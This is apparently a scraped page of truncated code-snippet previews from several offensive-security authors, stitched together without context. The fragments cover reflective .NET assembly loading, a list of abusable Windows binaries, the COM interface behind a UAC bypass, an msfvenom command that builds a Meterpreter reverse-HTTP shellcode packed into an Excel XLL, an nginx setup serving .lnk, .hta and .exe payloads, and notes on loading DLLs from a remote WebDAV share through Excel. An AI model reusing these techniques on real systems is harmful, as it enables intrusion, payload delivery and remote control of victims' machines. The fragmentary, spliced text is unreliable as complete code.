enkomio

open System
open System.Reflection
open System.IO

/// Use the private method GetTypeByNameUsingCARules in order to load the Assembly. This method will in turn uses the internal
/// method: private static extern void GetTypeByNameUsingCARules(string name, RuntimeModule scope, ObjectHandleOnStack type);
let loadAssembly(filename: String, className: String, methodName: String, methodArguments: Object array) =
    let bindingFlags = BindingFlags.Static ||| BindingFlags.NonPublic ||| BindingFlags.Public ||| BindingFlags.Instance
    let assemblyName = AssemblyName.GetAssemblyName(Path.GetFullPath(filename))
    let fullName = String.Format("{0},{1}", className, assemblyName.FullName)

enkomio

open System
open System.Linq
open System.Reflection
open System.Runtime.CompilerServices
open System.Collections
open System.Collections.Generic
open System.Diagnostics
open Microsoft.Diagnostics.Runtime
open dnlib.DotNet
open dnlib.DotNet.Emit

hasherezade

#include <Windows.h>

#include <iostream>
#include "ntdll_undoc.h"

PPEB get_default_peb()
{
#if defined(_WIN64)
    return (PPEB)__readgsqword(0x60);
#else

zerhacken

#include <iostream>
#include <string>

#include <cassert>
#include <iostream>
#include <string>

#include <locale>
#include <codecvt>

trustedsec

Rundll32.exe
Regsvr32.exe
Mshta.exe
Msbuild.exe
Cbd.exe
Csc.exe
Tracker.exe
Ntsd.exe
Bginfo.exe
Kd.exe

udaken

#pragma once
#include <windows.h>
#include <Shlwapi.h>
#include <Strsafe.h>
#pragma comment(lib, "Shlwapi.lib")

#include <utility>
#include <cassert>
#include <cwchar>
#include <cstdint>

hfiref0x

typedef interface ICMLuaUtil ICMLuaUtil;

typedef struct ICMLuaUtilVtbl {

    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE *QueryInterface)(
            __RPC__in ICMLuaUtil * This,
            __RPC__in REFIID riid,
            _COM_Outptr_  void **ppvObject);

Arno0x

// Compile with:
//		cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
//		msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
//		./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

#include <Windows.h>

jivoi

# Serving Random Payloads with NGINX
# add set_random module https://github.com/openresty/set-misc-nginx-module#set_random
# edit file /etc/nginx/sites-enabled/default

set_random $uri 1 3;

map $uri $payloads {
    1 /payload.lnk;
    2 /payload.hta;
    3 /payload.exe;

ryhanson

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc